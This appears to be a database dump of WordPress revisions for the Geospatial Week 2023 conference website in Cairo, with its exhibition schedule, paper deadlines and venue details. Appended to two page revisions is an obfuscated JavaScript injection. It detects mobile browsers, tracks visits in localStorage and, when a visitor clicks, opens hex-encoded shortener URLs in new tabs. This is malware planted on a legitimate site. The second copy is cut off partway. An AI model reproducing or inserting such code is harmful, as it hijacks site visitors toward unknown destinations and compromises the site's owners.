2</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5><strong>9:00 – 5:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5><strong>Tutorial Day</strong></h5>\r\n<h5><strong>Exhibition Setup</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 3</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>12:00-17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition Opening</strong></h5>\r\n<h5><strong>Welcome Reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 4</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 17:00</strong></h5>\r\n<h5><strong>18:00 – 20:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Exhibitors’ reception</strong></h5>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"170\">\r\n<h5><strong>September 5</strong></h5>\r\n</td>\r\n<td width=\"189\">\r\n<h5></h5>\r\n<h5><strong>9:00 – 15:00</strong></h5>\r\n<h5><strong>15:00 – 18:00</strong></h5>\r\n</td>\r\n<td width=\"217\">\r\n<h5></h5>\r\n<h5><strong>Exhibition</strong></h5>\r\n<h5><strong>Dismantle Exhibition</strong></h5>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></h5>\r\n&nbsp;\r\n<h5><strong>INFORMATION</strong></h5>\r\n<strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 03:59:43','2023-02-04 03:59:43','',2920,'https://gsw2023.com/?p=3744',0,'revision','',0),
(3745,1,'2023-02-04 04:06:39','2023-02-04 04:06:39','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Submission of Abstracts and Full Paper is Now Open</h5>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675469129167{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening  Registration : soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675475978120{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\